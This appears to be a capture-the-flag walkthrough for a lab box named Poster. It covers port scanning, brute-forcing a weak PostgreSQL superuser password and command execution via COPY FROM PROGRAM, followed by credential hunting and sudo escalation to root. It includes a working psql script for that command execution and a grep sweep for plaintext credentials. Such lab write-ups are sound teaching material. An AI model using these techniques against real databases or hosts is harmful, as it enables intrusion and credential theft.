Poster
The sysadmin set up an RDBMS in a safe way.
0x01 Introduction
What is an RDBMS?
Following E. F. Codd's relational model, an RDBMS lets users build, update, manage and interact with a relational database, which stores data as tables.
Today many companies store business data in relational databases rather than flat files or hierarchical databases, because a relational database handles a wide range of data formats and processes queries efficiently. It also organizes data into tables that can be linked to one another on shared columns, so a single query can pull from one table or several. A flat file, by contrast, keeps everything in one table structure, which is less efficient and uses more space and memory.
Most commercial RDBMSs use Structured Query Language (SQL) to access the database. The RDBMS structure is most often used for CRUD operations (Create, Read, Update, Delete), which are essential for consistent data management.
0x02 Information gathering
Start with rustscan, chaining into Nmap, to scan the target's ports:
dd@kalikali-123:~$ rustscan -a 10.10.217.90 -r 1-65535 --ulimit 5000 -- -A
[~] Automatically increasing ulimit value to 5000.
Open 10.10.217.90:22
Open 10.10.217.90:80
Open 10.10.217.90:5432
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -vvv -p 22,80,5432 10.10.217.90
Starting Nmap 7.70 ( https://nmap.org ) at 2021-03-10 06:23 UTC
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:23
Completed NSE at 06:23, 0.00s elapsed
Initiating Ping Scan at 06:23
Scanning 10.10.217.90 [2 ports]
Completed Ping Scan at 06:23, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:23
Completed Parallel DNS resolution of 1 host. at 06:23, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 06:23
Scanning 10.10.217.90 [3 ports]
Discovered open port 22/tcp on 10.10.217.90
Discovered open port 80/tcp on 10.10.217.90
Discovered open port 5432/tcp on 10.10.217.90
Completed Connect Scan at 06:23, 0.27s elapsed (3 total ports)
Initiating Service scan at 06:23
Scanning 3 services on 10.10.217.90
Completed Service scan at 06:23, 7.61s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.217.90.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:23
NSE Timing: About 99.76% done; ETC: 06:23 (0:00:00 remaining)
NSE Timing: About 99.76% done; ETC: 06:24 (0:00:00 remaining)
NSE Timing: About 99.76% done; ETC: 06:24 (0:00:00 remaining)
Completed NSE at 06:24, 95.27s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:24
Completed NSE at 06:24, 0.00s elapsed
Nmap scan report for 10.10.217.90
Host is up, received conn-refused (0.27s latency).
Scanned at 2021-03-10 06:23:12 UTC for 104s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGK2azIgGLY4GFFZlpgMpyOub/To5vmftSEWkjbtFkTBvc5tW/SpoDtjyNMT0JKJUmFJ2/vp6oIpwyIRtDa+oomuNL//exbp/i798hl8FFo4Zq5HsDvQCwNKZ0lfk0HGYgbXj6WAjohokSbkDY1U26FN/MKE2JxcXLcN8n1QmvVbP5p8zO/jgrXvX6DLv4eHxJjhzsBJ6DwFMchtBwy4CiTQsiCUcAyyua93LJO6NEnnM4SOwOUE/wyggCNPbwzB1wzPLAgaiU+M2gn9/XZGmlD+vWOBu3sruCB2PnRuM3cx27gDbbElR4KDIOq2ar66rV+yIZQoQ7KfVUNUFFCbRz
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN2f/wWkOMnH6rNZ+0m2p+PrzBVbz/vfQ/k9rx9W27i9DLBKmRM2b2ntmg8tSwHhZVTb/FvStJci9SIBLAqao00=
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open postgresql syn-ack PostgreSQL DB
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
| Fpostmaster.c
| L2015
|_ RProcessStartupPacket
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-29T00:54:25
| Not valid after: 2030-07-27T00:54:25
| MD5: da57 3213 e9aa 9274 d0be c1b0 bbb2 0b09
| SHA-1: 4e03 8469 28f7 673b 2bb2 0440 4ba9 e4d2 a0d0 5dd5
| -----BEGIN CERTIFICATE-----
| MIICsjCCAZqgAwIBAgIJAIrmTOUt3qZtMA0GCSqGSIb3DQEBCwUAMBExDzANBgNV
| BAMMBnVidW50dTAeFw0yMDA3MjkwMDU0MjVaFw0zMDA3MjcwMDU0MjVaMBExDzAN
| BgNVBAMMBnVidW50dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMca
| tkPhi1xPkNomQzkTX+XRDk0RPBxRJQm17+Q8sru8J72rToPVyZesM7v5M+ttfqlZ
| sHAevEv/iVb1D6hNPawU9kG61Ja9baHd1s31H7RjWxpMS2vZuiu6/oXNWpc4yinQ
| RDWgLqKhDzczacMWLxKkgh06H8DI04/4pCJ6pbf6gXFfVRrccOu1FmoVlWWdVeGd
| CZ2C8XOA1tEEE6UG9HI9Q2gd3AHOSex+ar3EnWm1LanYDQPJSXEgl/K2A9D5DQEw
| +xJxPnH9abqxUrLUDOxzbMpdqXfb0OHxy7jeBJhpd6DonAZTEACdsgh9SzssH4ac
| FOqjsJjfSzok3x3uBx0CAwEAAaMNMAswCQYDVR0TBAIwADANBgkqhkiG9w0BAQsF
| AAOCAQEAxGskqCN0uihEe1rpb7fveGYGMhDsFso9aYdJ4Q3CHJHX3leCN92nLCOq
| R9bTRgVjrvph00jO3+qhHzXCLbnpZXu9R9mPsfcDU/IFCFxMNmjRs4DkkzpGWAyp
| t5I18Zxh4JWJP7Mf1zc39z2Zk/IucAI5kMPMDJUWR/mjVFG/iZY8W+YlKsfvWblU
| tY4RYFhVy9JTVFYe5ZxghLxylYi+cbkGcPMj7qaOkDWIWhILZX1DDAb7cSfVd4rq
| 2ayWhA4Dh/FJkL2j+5mfAku0C7qMAqSlJTMRa6pTQjXeGafLDBoomQIIFnhWOITS
| fohtzsob6PyjssrRoqlRkJLJEJf2YQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.70%I=7%D=3/10%Time=604865D8%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,85,"E\0\0\0\x84SFATAL\0C0A000\0Munsupported\x20frontend\x20pro
SF:tocol\x2065363\.19778:\x20server\x20supports\x201\.0\x20to\x203\.0\0Fpo
SF:stmaster\.c\0L2015\0RProcessStartupPacket\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:24
Completed NSE at 06:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:24
Completed NSE at 06:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.86 seconds
Given the open ports, PostgreSQL on 5432 is the natural starting point, so fire up MSF...
Search for the matching modules and begin by enumerating database users (a login brute-force against the PostgreSQL service). This turns up an account with a weak password, and it is the built-in superuser:
postgres:password
0x03 PostgreSQL exploitation
Search the remaining modules for something to attack with; entry #13 in the results is a command-execution module based on COPY FROM PROGRAM, so try it:
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
With the options set it returns a shell straight away, running as the postgres system account (the OS user the database server runs under), not as root.
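What the module does under the hood, as an added example written for this page (not code from the original writeup or from Metasploit): the same command execution issued by hand with psql. It assumes psql is installed locally and that PGHOST, PGPORT, PGUSER and PGPASSWORD point at the target; the helper and table names are this example's own. COPY ... FROM PROGRAM has existed since PostgreSQL 9.3, runs the program as the account the server runs under (normally postgres), and is refused unless the login role is a superuser (or, from PostgreSQL 11, a member of pg_execute_server_program). It is documented behaviour, so the finding on this box is the weak superuser password, not a bug in PostgreSQL.

```shell
#!/bin/sh
# Added example (not from the original writeup or from Metasploit): the same
# COPY ... FROM PROGRAM command execution that the module automates, done by
# hand with psql. Assumed: psql is installed and PGHOST/PGPORT/PGUSER/PGPASSWORD
# describe the target; function and table names are this example's own.
# The program runs as the OS account the server runs under (normally postgres)
# and the statement is refused unless the login role is a superuser (or, from
# PostgreSQL 11, a member of pg_execute_server_program).

# copy_exec_sql CMD : emit the SQL that runs CMD on the server and reads back
# its stdout. Single quotes inside CMD are doubled so the string literal stays
# intact (e.g. "echo it's" becomes 'echo it''s').
copy_exec_sql() {
    cmd=$(printf '%s' "$1" | sed "s/'/''/g")
    printf 'DROP TABLE IF EXISTS cmd_out;\n'
    printf 'CREATE TABLE cmd_out(line text);\n'
    printf "COPY cmd_out FROM PROGRAM '%s';\n" "$cmd"
    printf 'SELECT line FROM cmd_out;\n'
    printf 'DROP TABLE cmd_out;\n'
}

# copy_exec CMD : run CMD on the database server and print its output lines.
# -q quiet, -t tuples only, -A unaligned, stop at the first SQL error.
copy_exec() {
    copy_exec_sql "$1" | psql -q -t -A -v ON_ERROR_STOP=1
}

# Defender's check (any role can run it): which login roles could do this?
#   SELECT rolname FROM pg_roles WHERE rolsuper AND rolcanlogin;
# On PostgreSQL 11+ also list members of pg_execute_server_program, then make
# sure pg_hba.conf does not expose those roles to the network with password
# authentication.

if [ "${1:-}" = "--run" ]; then
    copy_exec 'id; hostname'
fi
```

Run it with --run to execute `id; hostname` on the server. The quote-doubling in copy_exec_sql matters: a command containing a single quote would otherwise end the SQL literal and the statement would fail. The defender's counterpart is the query in the comment plus a pg_hba.conf that keeps superuser logins off the network.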
0x04 USER privileges
Browsing the home directories, credentials.txt turns up in drak's home directory.
It holds drak's username and password.
SSH in as drak.
Next, config.php in the web root gives away alison's password. As a general rule, sweep the home directories, the web root, /tmp, /opt and /etc once with grep -r password.
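A repeatable version of that sweep, as an added example that is not from the original writeup: it greps the given directories for credential-style assignments, skips binaries, and runs against a constructed directory tree so it can be tried offline. The directory layout, file contents and helper names are made up for the demo and are not the target's real files.

```shell
#!/bin/sh
# Added example (not from the original writeup): the "grep -r password"
# sweep as a reusable function, demoed on a constructed directory tree.
# Assumed: a grep that supports -r/-I/--exclude-dir (GNU and BSD both do);
# file names and contents below are made up for the demo.

# cred_sweep DIR... : print file:line:text for credential-style assignments.
#   -r recurse, -I skip binaries, -i ignore case, -n line numbers, -E ERE.
#   Requiring "=" or ":" after the keyword filters out prose mentions.
cred_sweep() {
    grep -rIinE --exclude-dir=proc --exclude-dir=sys \
        '(passw(or)?d|secret|api[_-]?key)[[:space:]]*[=:]' "$@" 2>/dev/null
}

# cred_sweep_count DIR... : number of hits (prints 0 when nothing matched).
cred_sweep_count() {
    cred_sweep "$@" | grep -c . || true
}

# Constructed demo tree mimicking the layout found on the box.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
mkdir -p "$demo_dir/var/www/html" "$demo_dir/home/drak"
cat > "$demo_dir/var/www/html/config.php" <<'EOF'
<?php
$dbuser = 'alison';
$dbpassword = 'demo-not-a-real-secret';
EOF
printf 'ssh credentials for drak\npassword: demo-not-a-real-secret\n' \
    > "$demo_dir/home/drak/credentials.txt"
printf 'The word password appears here without any value.\n' \
    > "$demo_dir/home/drak/notes.txt"

if [ "${1:-}" = "--demo" ]; then
    cred_sweep "$demo_dir"
fi
```

On the target the call is `cred_sweep /home /var/www /tmp /opt /etc`. The pattern insists on an `=` or `:` after the keyword so that prose mentions of the word password do not drown the real hits; widen it (pass, pwd, token) when the first pass comes back empty.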
0x05 ROOT privileges
Switch to alison. The comment in config.php above hints that she may have sudo rights, so check with sudo -l.
sudo su root then switches straight to root.